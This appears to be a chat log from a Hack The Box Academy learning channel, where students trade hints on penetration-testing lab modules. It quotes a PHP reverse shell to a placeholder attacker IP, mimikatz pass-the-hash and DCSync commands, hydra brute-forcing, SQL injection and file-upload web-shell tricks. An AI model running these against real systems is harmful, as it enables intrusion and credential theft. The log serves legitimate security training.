#modules

NICE!!!
good to see you bro
Nice to be back
how have things been?
Getting your module put together?
I'm almost done with path
you can DM me if you are desperate.
lol no, the response times for communication have been a barrier
Hi guys, im a beginner in the academy, I’ve just accomplished some tier 0 modules and I’m on the « Network Enumeration with Nmap », section « Host discovery » which explains how we can scan if a host is alive with nmap 😄
I don’t understand the question at the end of the module, I’m supposed to guess the operating system of the distant host just with an ICMP echo request… But how ? 😅
Just give me some hints, don’t tell me the answer 😄
@rustic sage the ttl times can point you in the right direction
Oh yes thank you, the response of the ICMP request has a 128 TTL times, that’s a windows system
I didn’t know that TTL times was specific to the host system 😁
thats why we learn. I didnt know until I learned here.
Hello,
Could someone please assist me with predictable reset token section of the Broken authentication module(first question)?
@normal laurel i might be able to help 🙂
Got it nvm
Lol hey Jared, got the answer so it’s kk
nice
Anyone else having issues with the VPN dropping?
I have that issue if I have my vpn going on more than one machine or vm
hey can anyone help I am super new to hack but want to learn how can someone help me do my first machine
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Yeah. I use the VPN on my linux box also. It connects and I'm able to ping the gateway but when running the Nibbles exploit I get this crash
stuck on footprinting MySQL... I can't connect to the server
I have tried installing mysql-server again but it wont work
🤦♂️ nvm
what i have noticed is if i have my vm connected, then fire up pwnbox or another vm I have that they take turns communicating. You have to only have one connected to the vpn at a time
crackmapexec doesn't work for me either. neither ncrack or medusa. and yeah, metasploit works fine here
Is that because it's just a subdomain/vhost for the inlanefreight.htb?
Hi there. Have you been able to solve this (ZAP Active scan not finding the critical vulnerability)? I have the same problem. Thanks and greetings
Question 7 for the active directory skills 2 questions is juicy potato the way we supposed to be impersonating to get the Administrator flag?
Using Web Proxies
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I need little help related to this question.
Can someone guide me
I tried to fuzz the decoded cookie but it is just a random 440 character long string
I encoded the decoded payload with base64+hex
in reverse order
hello, did you complete the using web proxies module ?
hi
Ncat: bind to 0.0.0.0:80: Address already in use. QUITTING.
anyone knowing what i have to do with this inside the pwnbox
i want to listen on port 80 with netcat for phishing with xss
but i keep getting this error and i dont know how to check which service is running on 80 on my pwnbox
@rugged stag @sly kelp for the question in ZAP Scanner i think the first time i do this i end up manually exploit the vuln but i did scan with zap and zap did find that vuln, hint look for ||command injection|| in zap scan output
for this i recommend you do it in burp the list isn't that long so it isn't going to take too long
I just started the "Intro to AD" module. I'm currently in the "AD terminology" section. There are tons terms that got introduced 😅 . I can understand what they're describing but it's hard to really absorb and memorize them without being able to apply them.
How critical is it to memorize them at this point? Or will I slowly get more familiar with them as I progress through the modules?
Not super critical
That's good to hear 🙏 . "memorization" isn't really my strong suit 😅
The other AD modules are significantly more hands on
np
I figured it out after writing the whole problem on paper i was messing up with payload processing part. It was double encoding every request.
I solved it later
Thank You
nice
@fresh wedge dm
For what I read in the chat, you need to ||log off windows and connect again||
i finally did it without reco. bcs when i tried the shutdown /r it tells me that i don't have the rights
i used a reverse shell instead
weird. I just did it and worked. had the rights
hello i m block for an very easy question
👏 going to continue this module. so long! 😂 if you finished it, I maybe will contact you private.
ok np
what's that ?
it is for HTB academy
just ask the question, u don't have to say u have one
Ask with #Module, then #section and #question to make it easier 😉
hi everyone I am still doing the starting point boxes. im on the 4th box (redeemer) and i am trying to do the nmap scan that the walkthrough mentions but it is taking me hours!! It ran over night and it still says 13hrs remaining... anyone have any recommendations to resolve this...??
the nmap scan that its telling me to do is nmap -p- -sV (ip address)
ask this in #starting-point also try rustscan
Are you scanning UDP ports ? if not.. stop the scan and retry it
i dont see the starting-point chatroom...
click this #starting-point
Hey all, I'm having an issue with the Footprinting Medium Lab, if anyone is available for some guidance? I am trying to mount the NFS share, but I keep getting errors that I'm not able to view the mount, even after mounting it as sudo, and trying to change the mount folder permissions, etc.
dm me
hello guys
if i want to practice hacking
what should i do
make a pc or use hacklab from hackthebox or use a vm
when I am installing cifs-utils , I am getting following error
cifs-utils has no installation candidate
The VM has the advantage that you can easily install software. If something goes wrong, you can simply reset the VM to its previous state.
So close to finishing password attacks. Only took a week lol
After long hours on the broken authentication skill assessment it's time to ask for some help. I got some users (more than the two obvious ones) and reduced the rock vocabulary to less than 50 entry. Now I suppose that I miss something somewhere. Any hints?
did you catch the hint about country codes?
also when attempting to get the password you need to set a delay between attempts
I got 4 departments on 5 country.... 43 passwords. I am checking all again... but it takes time due to the 30 second delay every 5 (more or less) login tests
connect to the vpn
@onyx dust i saw u had pb with ObjectAceType i ran the command with the sid but it doesn't end and it doesn't give me the ObjectAceType
Guys. I’m at skill assessment of Nessus. Tried to run the scan against the target but looks like it don’t detect it (I’m at the vpn of htb, checked). There is a mention that I’m supposed to log in to ssh, but why? I have my own Nessus
use localhost and the nessus port
on the shell
its not clickable...😬
I’ve done that, I’m inside Nessus but when running the scans it finds nothing about the target
which module is that?
it should have a premade scan to use
ACL Enumeration
what's the url
Oh wow. I was running my own instead of the IPs one
instead of using nessusd through localhost:8834 you want to visit https:// [the target ip that you spawn]:8834 accept the risk then login using htb-student credentials. it’s confusing but basically you just use the nessus port on the remote box. once logged in the nessus web interface the scans are the first thing you see. btw, you can see the...
I got it bro thanks!
Hi, may I ask you if you've been able to solve this? I did the fuzzing on the 32nd character of the MD5 sum with the encoding steps from before (in reverse order) but Burp Intruder only shows 200 response codes. Do you have a tip for me? Am I missing something here? Thanks!
filter this HTB{ in the burp intruder output
Hey, i’m having some trouble on the last question of login brute forcing. When I try to bruteforce the ftp I get an error message saying unknown service.
Here is my command i’m already connected with ssh on the computer. hydra -l g.potter-P harry.potter/rockyou-30.txt ftp://127.0.0.1
Ok thanks
Thank you. Very much appreciated.
THANK GOD!!! and @vital adder and @west canopy. Password attacks is complete!!
dm me
Does anyone have their own domain name? And if so what are your pros & cons, and regrets what would you do over? . Im primarily looking to build a website as sort of a "business card" for when I get offered IT jobs. Ive tried Hostinger and that's been not good, and I've looked into Domain.com. (sorry this isn't module related, I just trust your guys opinions over YouTubers)
you can get your domain name for free and you can host your website on github and yes it's very limited but free also you can get free ssl certificate and dns from cloudflare for free and it took me about half an hour to setup a website but that to me is just for fun
That sounds ideal, I'm gonna get googlin
the free domain name and cloudflare stuff i think is already on networkchuck channel the github host part i can't remember where i learn to do that

i think it needs to be -L not -l
no the problem is that i forgot an escape -L is when you are using a file and -l is when you use only one username or password
I couldnt remember which was the list. but in that case you had P and not p 😉
yeah because im using a file.
So its P not p
I read it wrong. I thought you had it the other way around
np
Hey everyone!
On the smtp footprint for the username question the wordlist provided as resource in the module does not match
Can anyone suggest a hint pls?
Thanks a lot!
Already tried with smtp-user-enum and metasploit with 2 different wordlists
🤔
The list is already correct. But as explained in the module, there are servers that take longer for a response.
I got with ||nmap smtp-enum-users a list of 10 users|| but those don’t work
I will try increasing the query timeout
Thanks @acoustic owl
From yesterday I was stating I was having problems running waybackurls from the Information Gathering module. I have figured out that I have to run it like this.... ~/go/bin/waybackurls -dates https://amazon.com > waybackurls.txt
Got it !
anyone who has done the xss module that can help me? the xss works but i have difficulty intercepting
🤫
Hello, anyone who can give me a hint on the "Documentation and Reporting" Skills Assessment? Based on the provided artifacts, I have currently no idea how to move forward...
I'm trying to understand how this reverse php shell works <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>
so it is executing the bash shell binary and redirects the output to a tcp connection on port 443 ?
Does it mean that I need to open a connection on port 443 to get access to a reverse shell launched by this line in the attacked machine ?
yes, you need to have a listener running on that port. (or whatever port you specify)
Thanks !
Hey am curious about the dnsadmin step on the windows priv esc module I was able to get the dll to make me a domain admin, but I wasn't able to directly access anything (or follow the guide to reg delete some things to be able to start up the dns server again) because of access denied privs etc. even though I right clicked and ran as administrator. I was able to get past this in some other way but is this normal behavior? I did not have access to the administrator's folder on the server as a domain admin, nor did I have access to use commands like reg
I fought hard to get a reverse shell instead but it never worked for me 😢
Hi Kvesta, have you been able to solve this? I'm having the same problem.
What if the DLL would not add you to the admin group, but would open a reverse shell instead?
so, I tried that and it did not work. It didn't give me a shell, but I'm still really new to this so I might have just given a bad payload. I tried though
dm me if you want
In the XSS module.. it shows only very basic XSS. For the exam, should you be able to do 'advanced' XSS payloads?
You just need to understand all that is shown in the modules. The exam only requires things that were explained in the modules.
Hello guys, I’m stuck in the « network enumeration with nmap » module, at the Firewall and IDS/IPS Evasion - Medium Lab…
I’m supposed to submit the DNS server version of the target… the target use the Google DNS, the target has the 53/tcp port filtered… I tried to open the port from a different source Ip, from another source port… but I’m stuck here for a few hours now 😅
Can someone help me with a few hints ? 😁
ahw okay, Thanks for clarifying!
think about what protocol DNS uses by default
You mean UDP ? I’ve seen that the port 53/udp is open, I will try this way thank you
Hello everybody 🙂 I just solved sqlmap essentials Attack Tuning case#6. It was clear to me, that the exercise wants me to use the --prefix/--suffix switches. Is there any better way than to just try all kinds of combinations I can come up with? In theory the dev could use an arbitrary amount of double quotes, back ticks, single quotes and parenthesis, correct?
Could I get some assistance with the Information Security Foundations pathway? I'm sure i'm answering a question right however it's not accepting the answer
I need some help with PIVOTING, TUNNELING, AND PORT FORWARDING Skills Assessment. Can't get the answer for question 3. I pivoted into the second host ran ipconfig and found the second network interface, but I pinged every host on the network and got nothing. I tried using cmd and powershell, but nothing... Is there something I should be doing differently? I'm so lost.
feel free to dm me
Which module and section do you need help with?
Hi, I’m on the last section of the « network enumeration with nmap » module, the hard lab
Do you know which service the client is talking about ? The hint mentioned that they require a large amounts of data, so I though about MySQL but the 3306 port is closed on the target… I need help 😢😅
There is not only MySQL 😉
Have you found a port?
@acoustic owl https://academy.hackthebox.com/module/87/section/906
the question is what does linux pam stand for, im inputting pluggable authentication module and its still giving me an error: incorrect answer
Check if you have a space in front or behind.
Linux Pluggable Authentication Modules (PAM) is a suite of libraries that allows a Linux system administrator to configure methods to authenticate users. It provides a flexible and centralized way to switch authentication methods for secured applications by using configuration files instead of changing application code. There are Linux PAM libra...
@acoustic owl i have, i've copy pasted exactly from wikipedia and still no go
reload the site and try then again
Here is the nmap « top-ports=20 » output of the target… I don’t see any ports that have anything to do with data manipulation… maybe I should look for other ports ?
Exactly.
Look again in the module. There you will be shown which port could be meant 😉
Thanks I will look again 🙌🏻
If you get stuck, write me a DM
hello friends
Hello 😄 I'm having fun learning CBBH, I find well designed even for a noob like me, I like the way that we practice all the learning paths. Aside of that, I feel that I would like to have suggested boxes related to the chapters we learn.
After you complete a module they give a list of related boxes i believe
is anybody here a pentester in real life for a job?
well theres no shortage of hacking opportunites
you're telling me haha 😉
but i meant for a paycheck and i was jw how much like htb content is it
well most of the HTB content creators are professional pen testers or have had experience doing so. So I would think yes . They base a lot of boxes and modules from their real life experiences,
oh. i wonder because this tweet https://twitter.com/sno0ose/status/1480786831272824832 makes it seem like the htb content is different
Been looking for a senior pentester for a 2 months, getting peeps with 0 exp asking for unicorn money or some experience from hack the box, and no practical. Where is all the damn talent these days?
well ya htb doesnt cover every aspect or every scenario and technology. You can be very specialized focusing on particular technologies and environments. Phones, small networks, corporate networks, military, etc. Some different specialized knowledge sets and programs with each. Technically hacking methodology and philosophy could be applied to anything .
not just I.T and computing
I need a nudge for Password Attacks | Active Directory Attacks & NTDS.dit
not a lot of entry level positions but guess you just have to grind with education and maybe little dark web work. Til all of a sudden you're a master? But things like HTB provide legal and ethical ways to practice and develop skills,
what question are you on?
darkweb work?
there is no darkweb work on dread
The third
at least that's what /u/Becky told me
I'm hoping the hint isn't misleading me
oh I thought the hint was referring to using --ntds on crackmap
thanks
then try those names with that password list from the hint. you should get the answer
yeah ?
what work are you talking about it's mostly drug addicts
on the reddit of tor, called dread, there is no work -- at least that's what i hear from /u/Becky
ok
nobody hiring out there they only want u to phish icloud
¯_(ツ)_/¯
you can see the user becky on the versus subdreddit talking about baby formula before the united states congress
versus the one that was raided
but that's for another channel or DM i think
i'm here 4 the modules
There's actually a lot of jobs but they need very advanced level of knowledge and skill.
very little entry level stuff
ah well. maybe that guy from twitter can post some listings there or something, then.
Executing SQL command.. but it doesn't work
show tables; i remember a kind of super command need to be added first like <super> show tables; i just forget
please help
[-] ERROR(ARCHETYPE): Line 1: Could not find stored procedure 'show'.
SQL>
oh mssql?
yes
does tht work 4 u?
@grizzled dune apparently we were both blind from scrolling, here are the Academy channels 😄
I found out that i can execute cmd command in the SQL
thanks mn
oh
This is the channel to discuss modules, and there are other channels for other sections of Academy
Perhaps I am blind
It's under the category HTB: ACADEMY on the left
Lol
😄
Well I’m blind
Sorry! Me too apparently
Oof
hey! Could someone please help me with Weak Brute Force module Q#2? Im stuck and no sure what else to try
nevermind, Got it
Noice 🙂
Hey all, maybe someone can help me with this: I'm trying to setup a fully interactive tty in a reverse shell.
Here's the commands I've run:
(On host) nc -lvp 9443
(On remote) curl http://ip:port/link/to/image.php
(On host) python3 -c 'import pty; pty.spawn("/bin/bash")'
From there, I followed this (https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method-3-upgrading-from-netcat-with-magic) to try and get tab completion
(On host) ctrl+Z
(On host) echo $TERM
(On host) stty -a
(On host) stty raw -echo
(On host) fg
(On host) reset
The guide indicates that I should now be seeing the reverse shell again. I don't. When I hit enter it shows ^M
I need some help with PIVOTING, TUNNELING, AND PORT FORWARDING Skills Assessment. I know I need to get the password for vfrank but nothing I've done works. I've transferred over mimikatz and I got his NTLM hash, but I can't crack it with hashcat. I'm at my wits end, need some help. Can anyone give me a hint?
What wordlist are you using?
@modest token i was able to get cleartext password via mimikatz 🙂
sec i will dm!
For the user ||vfrank||? What command did u use?
Take it to dm 🙂
Hey peeps, I am on the stack based buffer overflow - Windows (module/89/section/946) ... I am following the instructions to convert the pattern text file to a .wav file. However, when using IDLE to run the python code to generate the file I am getting this message. Any idea why this is the case?
Python is very picky with indentation
That red section.. remove it.. it's a load of spaces or something
Make sure indentation is consistent, no mixing of tabs or spaces
I did not indent, it was immediately next line, I even tried putting them in the same line and I still get the message
did that and it brings the next line up then when I press enter to keep it consistent I get the same message. I am (at least I hope so) copying the instructions on the module exactly
Well gotta be something to do with indentation, that's clear, not sure what to say
thanks, will try to mess around and see whats up
But yeah.. that big red bar looks like some trailing spaces or tabs on line 4, after f:
for anyone who might be wondering what the answer is:
If you are using zsh (ps -p $$)
stty raw -echo; fg
[enter]
[enter]
Follow this with the commands listed in the guide linked.
Hey could anyone give me a quick nudge with the Footprinting Medium Lab? I am mounting the NFS Share, but getting Access Denied when attempting to access the directory inside.
@vale salmon sure DM me 🙂
Could someone help with File Upload Attacks -> Type Filters?
Everything I can upload comes back with an error from the server when I try to access the uploaded file saying the uploaded file contains errors and cannot be displayed.
can someone help me with vhost fuzzing (information gathering - web edition)
maybe lol
Whats the question
for all of the flag you can just use gobuster with ||subdomains-top1million-110000.txt|| or something smaller
what payload and file name did you use?
It looks like all .php are blocked, so I tried the others in the seclists list (.phar, .pht phtm phtml)
those all come up as unable to load on the server though
for the filename
For the payload I tried the php webshell with a GIF and JPEG magic byte
i'm using the 5000 version of that list with ffuf now and it's doing like 2 requests a second instead of like 200 xD
first try with just the jpg magic number and use ||.phar|| extension with ||.jpg|| but swap the extension in burp when upload
Sorry can I dm screenshot? I think I'm doing that, but I might be missing something
sure
if i'm going gobuster on my pwnbox i get like 50 requests a second but if i run the same command on my machine with the vpn i still get like 10 requests a second so not that slow and didn't use ffuf that much so i can't if it's the tool that slow or the internet
so i think there's a problem with my /etc/host but i can't figure out what it is lol
can i dm you?
sure
try switching to root acc, 1. sudo su then 2. try mount -t nfs ip:/{sharename } /{dir_ you_created}
So I went ahead and tried to create the file, using the same method I did previously and this time it worked! When I run it I do get a IDLE shell pop up saying "Restart: C:\Users...\win32bof_exploit.py" ... Now am I not supposed to see the pattern.wav file on the desktop? because I dont see any new file added.
in Password attack module are we supposed to perform privilege escalation in any section, as I am stuck in two sections where root password is needed
or maybe I am overlooking something
Im stuck on the same part. Can I DM you?
sure
In which section and on which question are you stuck?
I am stuck on Passwd and Archives section
just found the back files for the Passwd section
DM
i'm doing the ssrf module and this snippet for automating execution keeps giving parse errors. I have tried to run it directly and also as a bash script. I did put in the actual target ip
I have some questions for Active Directory Enumeration & Attacks part "ACL Enumeration" if someone can help ?
dm me
on the AD module, skill assessment 1 i'm blocking on this question
type c:\Users\Administrator\Desktop\flag.txt
i get this flag but now i need to connect to MS01 as ||svc_sql||
Thanks, appreciate the help, I got it figured out
have you tried kerberoasting yet?
i have instructions on the forum on how to make a tunnel
one sec
after you make a tunnel u can xfreerdp into it from your attack host using the credentials you got
there is another user in the thread doing it with msfconsole and autoroute
https://forum.hackthebox.com/t/active-directory-skills-assessment-i/257250/48 is the thread if you want to read
idk who needs to read this but I was able to create a nice RDP tunnel to MS01 from my linux attack host using these simple steps which u can learn from the pivoting and tunneling module too. if you prefer a windows experience try these tricks. First, from the webshell, set the registry key so we can log in Set-ItemProperty -Path 'HKLM:\System...
but the way i posted is a windows way
where you can just have the luxury of copy pasting stuff into it
no need to setup any listeners or anything
to transfer files between attack and target locations
did it work?
not unless u on a box with no dns which happens a lot in these fake environments.
i did the nslookup from the webshell when i was getting the information
got the rdp connection with the found user. but it's a bit annoying not to find other computers on the network
u only need to go to the dc01 host from there
i like making the rdp tunnels because you can use /pth:$HASH with xfreerdp and it's just nice.
yeah, this time we can crack the hash but it's still good to be able to pass the hash
yeah in case u dont have a password or cant crack it, it's nice.
but is this normal that i can't connect using the 2nd user found ?
that's normal. i used mimikatz pass the hash with impersonate for that user
u can do it locally then do the attack as that user
like this mimikatz sekurlsa::pth /user:t* /ntlm:<ntlm> /domain:inlanefreight.local /impersonate
then can do the attack from mimikatz too using lsadump::dcsync
i used all windows exe and rdp tunnels for this one
idk what you're doing
hi everybody , im stuck in Broken Authentication - Bruteforcing Cookies question 1 , i tried decrypting the cookie with base64 + ASCII hex then changing the user htbuser role to admin , superadmin , administrator etc with burpsuite and reverse encoding to generate the cookie but couldn't find the flag , can anyone give me a hint ?
but i got there creds using mimikatz, but when i try to xfreerdp it doesn't work
i may be able to help
Honestly, the killer app of HTB Academy is introducing you to a bunch of tools you never knew existed
i used mimikatz like this after getting admin hash from mimikatz dcsync attack mimikatz # sekurlsa::pth /user:administrator /ntlm:<ntlm> /domain:inlanefreight.local /run:".\psexec.exe /accepteula \\dc01.inlanefreight.local -h cmd.exe" and that's how i spawned the shell
I do disassemblies all the time in my day job but decided to do Intro to Assembly Language anyway, and using GEF in gdb is a gamechanger
the cmd pop up and then close itself, do u know why ?
no
Do you remember the first time you passed the hash? It probably went a little something like this: [crayon-62f6b43c35c47694569065/] If you are unfamiliar, that is the Metasploit PSexec module being used. Well, nowadays we don't really do that anymore. You probably pass the hash something like this: [crayon-62f6b43c35c53778222369/] That is Crac...
you can do a number of things with the admin hash like try evil-winrm from linux
idk why you're experiencing that problem but u can also do as an argument to cmd.exe /c type C:\users\administrator\desktop\flag.txt &&echo&&pause and it will persist
since you know what you're going to do with the cmd anyway u can just pass as an argument
¯_(ツ)_/¯
thx, it didn't work when i tried with the 2nd user but worked fine with the admin
w00t
could someone help me with this. got stuck for days!!!
module SQL INJECTION FUNDAMENTALS
section query results
why docker.hackthebox.eu?
Use the Target IP
@spare maple i justed tested on pwnbox and I am able to connect to mysql
may i dm you mate!!
Hi there, anyone who can help me with Upload File Attacks? When i've managed to upload the shell and I want to go to there, it only displayed the php code. Not the shell. I've downloaded the shell from phpbash... I don't get it what I'm doing wrong.
are you sure PHP is installed on your target machine?
Yeah
what's this IP?
when i open it in the firefox browser, it execute half :-p, but can't do anything with it
before you say anything else please tell me what is this machine?
Parrot.
the webserver
Feel free to DM me
Thanks!
if you need help feel free to dm
hey there! Can someone help me in the Password Attacks Module? I'm stuck at the mutated password section
Feel free to DM me
Thank you very much. I've got it
Hey people. I am having trouble with one task on the Linux Fundamentals. When it says to press Ctrl+W it just closes my tab. Is there a easy way to disable it or ????
Which distro on your VM? Or are you using pwnbox?
pwnbox
remember that PwnBox runs in your browser. Therefore the keyboard shortcuts do not apply there.
For the Password Attacks: Network Services exercise, is there a way to get the username for WinRM without bruteforcing all combinations?
I had to bruteforce all combinations. Some tools/services may allow higher throughput in bruteforcing
For "Password Attacks: Credential Hunting in Linux", I am having trouble bruteforcing the initial foothold to run the local Linux tools. I tried the hint (||Kira:LoveYou1||) and searched Discord history. I also tried the password.list and mutations of LoveYou1. Am I missing something obvious?
@kind flume try looking in your ||mutated password list for mutated versions of "LoveYou1"||
Hey @west canopy can I dm you?
sure
Disregard, got it sorted. ~Working through Nibbles. When I try to sudo the monitor.sh file for privesc to root, it asks me for nibbler's password. Not sure what I'm doing wrong. I've been through this one before and don't remember experiencing this issue.~
I've used every enumeration tool of the Active directory module skill assessment 2 but can't get any user, any help ?
Can I have help with the Assembly Skills Assessment please?
I've added this to the end of my assembly code.
I've removed the movabs, properly assembled and linked it,
Ran it in GEF, the program eventually ends with a SIGSEGV; I am unsure how to get the flag --the instructions are a bit confusing
anyone finish attacking common services?
what's the issue?
Heyo,
Could someone give me a little nudge for the Web Service and API Attacks Skills Assessment please?
Is information security fundamentals preferred before doing bug bounty path or just Jr Pentester?
If I started over I would do infosec path first
Information security path will give you a foundation that will help you with the other modules
Ok I see thanks
im on the zap scanner module... and i think im stuck... but not completly stuck.. wondering if someone can give me a hint if i show u what i found so far..
I got this far... but not sure where to go next..
trying to find the flag.txt... ive gone through most of the directories i could find using the ping.php utility... haven't found the file yet so wondering if there is another step and i have to crack that hash
How much of the HTB VIP boxes utilizes web hacking
Like I just wanted to ask
I want to gain advanced web app hacking skills
just step through it until you see the assembled flag in GEF ?
Hmmm that’s what I have been doing
I’ll take a look at it 👍
😎
have you tried to use responder ?
Do advanced HTB boxes require advanced web app hacking skills?
Web penetration testing is very important
I would say most of the boxes in HTB use some sort of web hacking
There is also an increasing trend to move everything to web
Ok
It is a very invaluable skill
So would HTB boxes all build upon bug bounty pathway but go over more advanced?
Like can I gain advanced web hacking skills via HTB?
I want to become a well-rounded hacker but I want to make sure I include web
yes
Nice ok
The bug bounty pathway is very comprehensive
Yes
CBBH is still a great start tho
For hackthebox machines you are going to want to learn how to do privilege escalation in windows and linux
Also when you start doing boxes don't be afraid to use writeups and IPPSEC at first
HTB is a bit of a learning curve
Ok
I want to get good at bug hunting. Is practicing IRL good while doing HTB VIP?
So to be honest I have never done bug bounty hunting in real life yet
But I think it would be very helpful
Ok thanks
Hackthebox+Hackthebox academy are great for learning theory
But I don't think anything can beat doing things in real life
Ok
So as soon as I get CBBH certified then I should immediately start bug hunting right?
Your hacking journey is up to you. Once you complete CBBH you will have the necessary skills to be a bug bounty hunter. If it were me, I would start bug hunting afterwards
Ok thanks
I’m just finishing Linux fundamentals path right now
About to do Windows fundamentals
I know but I want to be a competent bug hunter
Ok ya
but u dont need the cert to submit bugs u just need the product of the training
I know
Hi there! Can someone help me with the Predictable Reset Token question1? I have the script to generate tokens using username+time, and have used the epoch ending in 000 as the example suggests, but no luck.
Do any of HTB boxes require Python skills?
you have to use a range between the seconds
Oh yeah, I'm trying with seconds between +-1000 and +-1500, but it didn't work neither
Broken Authentication module
Looking at broken auth -> weak bruteforce protections q2, from the task outline it looks like I just need to modify the python script from the last exercise to add another header, but I'm not getting anything
Have I misinterpreted the question?
Cheers
So I’m not sure I’m doing the command right, I’m not, but with module 18 section 75 is asking index number of sudoers file in the etc directory
Command is ls -I /etc/sudoers and it gave me 964110 is the index, what am I missing?
So I should learn Python to practice HTB?
Is Python or scripting a skill I need for advanced boxes?
Is that what this convo is about?
hi i'll send u some code
Hi do I sound silly when I ask how much scripting skills and what languages are good for HTB?
Can I get away with just Python?
At what level do boxes require Python?
With regards to HTB academy, there are some modules that make use of it. Not sure the extent since I'm not yet on those modules. If ever your concern is for the boxes, maybe you can check in the HTB platform related channels.
look in the info category of vulnerabilities highlighted in blue that concern SMB. Can filter some results by filtering for vulnerabilities on port 445
all languages are good. the point is to be able to express yourself with the computer. as long as u can do that u are good. python is good but i just showed someone how to use php to do the python example since it's easier to read and process with the command line 🙂
can anyone help me with this
try to dig for txt records, since the question says it has quotes in it
got it !! thx
solved it by using subbrute and axfr. trick part it to find the nameserver first to make commands working
What about for HTB VIP?
I'm doing the WIndows Privilege Escalation module and up to the Windows Built-in Groups section. The password provided for the svc_backup account doesn't seem to work? I've double-triple checked i'm typing correctly... anyone else had this issue?
I didn't notice a specific channel for VIP. I'm not a VIP though, so I might not have access to it.
But like when in VIP do I start to need languages? How advanced should I be at a given language?
Nevermind, using xfreerdp instead of rdesktop worked for some reason
SQLi fundamentals, ‘using comments’
Q : Login as the user with the id 5 to get the flag.
A : trying to use this query on username field using comment and or statement , and ‘anything’ password.
OR id = 5')--
*login failed, with this error
Executing query: SELECT * FROM logins WHERE (username='OR id = 5')-- ' AND id > 1) AND password = '321fad32ead0f58206147440dc1ca939';
can someone help me with this?
idk because i'm not in vip i'm not even done with htb academy sorry
Ok
@quasi wave I would recommend understanding common programming concepts and being able to obfuscate code.
Ok
Which means you should probably know to code
Is it really necessary? No
Is it very very useful? Yes
So would doing a Python development course be a good idea? At what point should I learn how to code? I want to get it done because I want to be able to write my own hacking tools, etc.
But I don’t want to spread myself thin and I feel like for me just focusing on the fundamentals would make more sense
At what point should I add in Python on top of hacking in your view?
I want to know web hacking, wireless hacking, network hacking, Linux exploitation, Windows Exploitation, social engineering, and OSINT, and maybe desktop app and mobile app hacking (and maybe mobile device exploitation)
But I could go without the maybes
If it’s unrealistic
I’m thinking of being able to hack these things employing Python
If I remove desktop app/mobile app/mobile device hacking from the list
Is that realistic?
I want to also possibly know IoT hacking or something like it
I am interested in learning to code tho
So at what point in HTB does coding become useful?
Also knowing how to exploit Mac would be a huge plus but I don’t have to have it
My favorite hacking tho would be anything that helps with hacking things over the internet
Or at least that’s what I lean towards
Take things one bite at a time. Learning all those right now is an impossible task
If you want to learn how to make your own tools you should take a python course beforehand
I was in your position a while back as well. I wanted to learn lots of stuff. However, it felt overwhelming so I decided to slow down and focus on the fundamentals first. I'm now going through the academy modules so that I can have a solid base to which to go into the different possible specializations.
It might be a slower path, but I believe it has compounding effects in the long run
It’s a marathon not a sprint
😐
is that the Attacking Common Services - Attacking DNS section? someone i help on that same section found a pornhub subdomain
you mean before learning to make tools or before learning hacking?
Before learning to make tools
right obviously
ok
If I asked you if a specific Python course on Udemy was good for tool building in terms of extensiveness, would you be able to look at the course curriculum and tell me if its an appropriate course?
there are three I am looking at
I think for now the python course on hackthebox academy will be helpful
start there
However it won't go super deep probably
but lets say for when I need to go super deep
https://docs.python.org/3/ Use this as your reference when you want to go really deep
like I am wondering if Angela Yu's Python course, Colt Steele's Python course, or Tim Buchalka's Python course, is best?
ok thanks
so I don't need a Udemy course?
just by making stupid games
ya
everyone learns differently
ok
that worked best for me
But to be honest I don't think making your own tools is super necessary. There are bajillions of programmers who will do the hard work for you
ok
but what would I use Python for in hacking?
because I want to know how to use Python for hacking when necessary or programming in general
also I want to be able to program hardware and electronics in Python
so ya
and automate tasks and maybe make websites in it
something like that
hardware is probably better with c or another integrated language
ok
If you mean microcontrollers etc
ya
C, Rust, Go I think are what you want for that
I think you are asking to learn waaaay too much haha
isn't Python #1 for hacking tho?
no such thing as #1
I also want to automate tasks, do calculations, and use a language for well-rounded hacking skills
hacking just needs automation I think
Do the same thing many times
Bash might even be better than python depending on what you are doing
What is your endgoal?
You can't learn everything about hacking at once
You got to start slow
I want a language that will help me be better at web hacking, wireless hacking, network hacking, SE, and OSINT
and maybe IoT
but if I had to pick two or three things
web hacking, SE, OSINT
so a language that made me best at hacking websites, social engineering applied to hacking, and OSINT
so ya
Step by step
For these 3 domains you won't be using python too much
To do web dev?
Don't worry much about programming languages now. Just do the CBBH path
ok
thanks
I'm finishing HTB Academy Linux fundamentals path and LinuxJourney (which is a free website that teaches Linux) and then I'm gonna start learning Windows Fundamentals Path
just using Linux Journey to reinforce Linux concepts
ya
Take your time. It's all about the journey : )
Be patient persistent and consistent
ok thanks
If you practice hard and smart, you will become an amazing hacker with enough time
Instead of trying the same thing over and over again, try to think outside the box
Start with CBBH
ok
you mean once I get Linux, Windows, networking, InfoSec fundamentals down?
thanks btw
yesh
ok
no prob
I was in your position not too long ago
but For the past months I have been putting in my all
ya
And I have come really far
well its great to see someone who's made progress
I mean are there people that are advanced hackers in this Discord that I can ask for mentorship?
Read email if anyone interested https://mediatemple.net/community/products/vps/204404584/sending-or-viewing-emails-using-telnet
I feel like there are a lot of people like yourself who can help me but I thought I would ask
you give very good advice btw
I wouldn't call myself extremely advanced but I can give you mentorship
Depends on the person
ok
I think you totally could
ok
I can add you to my discord server and you can go crazy with questions about hacking
ok sure
If you want mentorship
sure
Guys and Gals I am on the stack based buffer overflow for windows and I am trying to create the pattern.wav file to control of the EIP. I Followed the instructions for python as mentioned but when I run the code it pops up IDLE shell but does not generate the .wav file. Any idea what I might be missing in my steps?
@vital adder any hints on how you ended up defeating it?
Hi everyone I am doing the Windows Priv Esc Module and got stuck trying to crack a NTLM hash. Can someone give me a nudge?
the Attacking DNS section? after you found all of the subdomain dump "all available record" ||(DNS zone transfer)|| also the subdomain that have the flag start with an ||h|| but it isn't ||helpdesk||
if subbrute are too slow use gobuster but if you can't find it with gobuster use subbrute and remember to use the custom name server
.
yes but it doesn't give me anything. i thought it was that bcs of the way the question is asked
im stuck on the skills assessment for the lfi module and i know you have to log poison but i can't seem to be able to lfi to the log file: ilf_admin/index.php?log=/var/log/apache2/access.log
can anybody tell me how to recover facebook id if forget the password
../../../../
nope i forgot to mention i tried multiple directory traversals
